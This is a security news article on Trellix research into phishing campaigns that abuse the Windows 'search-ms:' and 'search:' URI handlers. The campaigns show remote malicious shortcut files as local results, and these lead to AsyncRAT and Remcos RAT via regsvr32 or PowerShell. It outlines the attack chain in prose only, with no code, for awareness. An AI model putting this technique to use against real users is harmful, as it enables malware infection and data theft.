As per cybersecurity analysts at Trellix, an authentic Windows search feature has become the latest tool in the hacker’s arsenal. Malicious actors are exploiting this feature to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans, specifically AsyncRAT and Remcos RAT.
The unique attack technique misuses the “search-ms:” URI protocol handler, enabling applications and HTML links to initiate custom local searches on a device. It also exploits the “search:” application protocol, a process for invoking the desktop search application on Windows.
“By directing users to websites that misuse the ‘search-ms’ functionality via JavaScript hosted on the page, the attackers have expanded their attack surface to HTML attachments,” reveal cybersecurity researchers Mathanraj Thangaraju and Sijo Jacob.
Threat actors are known to use fraudulent emails, which carry hyperlinks or HTML attachments containing a URL that redirects users to compromised websites. This activates the execution of JavaScript using the URI protocol handlers to conduct searches on a server controlled by the attacker.
Clicking on the link generates a warning “Open Windows Explorer?”. If approved, “the search results of remotely hosted malicious shortcut files are displayed in Windows Explorer, masqueraded as PDFs or other trusted icons, imitating local search results,” the researchers clarified.
This clever technique creates a sense of trust by concealing the fact that the user is being provided with remote files. Consequently, the user is more likely to open the file, assuming it’s from their own system, thereby unintentionally executing malicious code.
In case a victim clicks on one of the shortcut files, it results in the execution of a rogue dynamic-link library (DLL) via the regsvr32.exe utility. In an alternative version of the campaign, the shortcut files trigger PowerShell scripts, which discreetly download extra payloads while displaying a decoy PDF document to mislead victims.
Regardless of the method, these intrusions lead to the deployment of AsyncRAT and Remcos RAT, enabling the threat actors to remotely control the hosts, pilfer sensitive information, and potentially sell the access to other cybercriminals.
As Microsoft continues to tighten its defenses against such initial access vectors, it’s predicted that adversaries could exploit the URI protocol handler method to dodge traditional security defenses and disseminate malware.
Researchers caution, “Refrain from clicking on dubious URLs or downloading files from unverified sources as these actions can expose systems to malicious payloads delivered through the ‘search’ / ‘search-ms’ URI protocol handler.”